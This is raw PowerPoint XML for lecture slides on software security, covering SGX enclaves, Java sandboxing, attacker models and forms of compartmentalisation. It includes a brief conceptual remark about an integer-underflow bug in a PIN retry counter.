              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> } </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106501" name="Tekstvak 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9A8E7C-B11D-D204-7C7A-5FCF461FA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5124450"/>
            <a:ext cx="1968500" cy="1477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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t># include ″secret.h″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… // other modules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void main () {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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106502" name="Tekstvak 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C5D86B-C17C-EC8C-5997-50F8A49DD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1000125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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106503" name="Tekstvak 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E38B0455-3154-27CB-9F6A-D685D2F8A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4729163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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>main.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Bijschrift met afgeronde rechthoek 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C10EF364-6820-94C2-40F3-C950EEC16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1116013"/>
            <a:ext cx="3671887" cy="1511300"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -133472"/>
              <a:gd name="adj2" fmla="val 135236"/>
              <a:gd name="adj3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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Repeated calls will cause integer underflow of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tries_left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, given attacker infinite number of tries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D0CD50A-A1D4-4DCD-DA33-F925A9CDE8B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4608513" y="3708400"/>
            <a:ext cx="4535487" cy="301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2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Moral of the story (this bug):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You can still screw things up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You have to be very careful writing security-sensitive enclave code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But: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9900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Screwing up anywhere else in the program can not leak the PIN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88A816-5D15-5D9F-1EE1-DF670E922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1028700"/>
            <a:ext cx="8642350" cy="62071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nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I/O attacker                                                                                                                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    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nl-NL" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code attacker                                                                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRP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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp;                                                                                                                     SGX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protect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against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this</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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nl-NL" sz="18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nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Platform level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,                                                                                     ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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application</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SGX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>also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protects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against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this</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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nl-NL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nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In all cases, the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ensure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> it exposes only the right functionality, correctly &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>securely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (eg. with all input validation in place)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7523" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0450FA9-4326-8E5E-EA14-356C61EBB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138" y="287338"/>
            <a:ext cx="8642350" cy="814387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US"/>
              <a:t>Different attacker models for software</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/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8C09B12C-988C-8E3E-5D74-29CB8D08B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E1BA22F-8F33-497D-B67B-EE1F0AA42467}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93190" name="Groep 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAD8601B-B1D4-D6C6-EBF3-FAA5E3F423E8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4576763"/>
            <a:ext cx="2551113" cy="1606550"/>
            <a:chOff x="5999163" y="4057650"/>
            <a:chExt cx="1604962" cy="1348912"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107541" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{261D8E29-C825-6095-1AFD-7CB38FD01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9163" y="4057650"/>
              <a:ext cx="1604962" cy="787863"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFF33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50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nl-NL" altLang="en-US">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>application</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107542" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D03740A9-831D-481D-A4EA-3B658CA93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9163" y="4919893"/>
              <a:ext cx="1604962" cy="476020"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC0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nl-NL" altLang="en-US" sz="1600">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>platform</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="1600">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="107543" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0929D4-5B7E-19DA-E395-DE2C3D9B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492" y="4919893"/>
              <a:ext cx="381010" cy="486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44" name="Right Arrow 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999E450B-1141-DC54-43D2-A2937B557B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049294" y="4753769"/>
              <a:ext cx="654050" cy="223838"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50269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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93192" name="Groep 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061D90E9-4D66-B3F2-C7B0-04B63A4B11E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3140075" y="990600"/>
            <a:ext cx="4638675" cy="1106488"/>
            <a:chOff x="2965450" y="993330"/>
            <a:chExt cx="4638675" cy="1132400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="107534" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAFEFC82-B27E-8024-0DC3-42DB4411B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5450" y="993330"/>
              <a:ext cx="4638675" cy="954533"/>
              <a:chOff x="3031741" y="1213928"/>
              <a:chExt cx="4638341" cy="953900"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="107536" name="TextBox 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0530DD67-732B-F595-0BEC-D284D9AECA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6602" y="1213928"/>
                <a:ext cx="2012448" cy="384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nl-NL" altLang="en-US" i="1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malicious input</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" altLang="en-US" i="1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107537" name="Picture 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE50D7D5-70CA-25A1-1374-8E211E16C4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741" y="1438246"/>
                <a:ext cx="666383" cy="666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538" name="Right Arrow 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30EFFF5D-B826-1E7E-8853-3612292CC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7386" y="1513211"/>
                <a:ext cx="1879386" cy="290514"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                  <a:gd name="adj2" fmla="val 50016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>
                  <a:lnSpc>
                    <a:spcPct val="116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107539" name="Right Arrow 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB69E817-C857-A989-5D0C-BD32AC42C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987386" y="1786056"/>
                <a:ext cx="1839460" cy="299370"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                  <a:gd name="adj2" fmla="val 49952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>
                  <a:lnSpc>
                    <a:spcPct val="116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107540" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D3530F-E34F-F57A-EE41-5B358C977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5236" y="1382536"/>
                <a:ext cx="1604846" cy="785292"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCFF33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1">
                  <a:lnSpc>
                    <a:spcPct val="200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nl-NL" altLang="en-US">
                    <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>application</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" altLang="en-US"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107535" name="TextBox 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2FBAEA-973F-B4E0-10DB-44884C652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325" y="1757430"/>
              <a:ext cx="25098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nl-NL" altLang="en-US">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>observable output</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US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71C07E89-8B10-A3A0-0452-99EB1A4A2D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5667375" y="2509838"/>
            <a:ext cx="2598738" cy="1287462"/>
            <a:chOff x="5667375" y="2509838"/>
            <a:chExt cx="2598738" cy="1287462"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107528" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F494A351-2EAE-19C0-C668-A4393F99A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7375" y="2509838"/>
              <a:ext cx="2598738" cy="1287462"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFF33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nl-NL" altLang="en-US">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>application</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr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b="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107529" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9CFC4D1-4C85-4A6F-CF17-5FDC008B1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4310" y="2986088"/>
              <a:ext cx="1331015" cy="704850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC0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nl-NL" altLang="en-US" sz="1600">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>malicious</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nl-NL" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a: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nl-NL" altLang="en-US" sz="1600">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>component</a:t>
              </a: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b="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="107530" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9852561-BA3A-F483-8796-C1FC9BFC9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9685" y="2895109"/>
              <a:ext cx="400698" cy="40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31" name="Right Arrow 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADDAC59-E27D-2B75-379D-9BDB54ECFEF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911798" y="3482681"/>
              <a:ext cx="388494" cy="165430"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5024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07532" name="Right Arrow 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D324F2C4-05CC-EF4E-EE70-85003F862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8488" y="3235325"/>
              <a:ext cx="360362" cy="217488"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5025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07533" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ADCB2D0-7634-0F38-8365-0EDC4430B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2350" y="2959100"/>
              <a:ext cx="768350" cy="704850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFF33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nl-NL" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a: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b="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7C0EEE4-50A3-674D-F554-0A178C93F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Recap: different forms of compartmentalisation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EBC51-77FD-9927-1C1D-45A5B488A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1116013"/>
            <a:ext cx="7200900" cy="5640387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conventional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OS acccess control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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Language-level sandboxing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>safe languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Java sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stackwalking</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
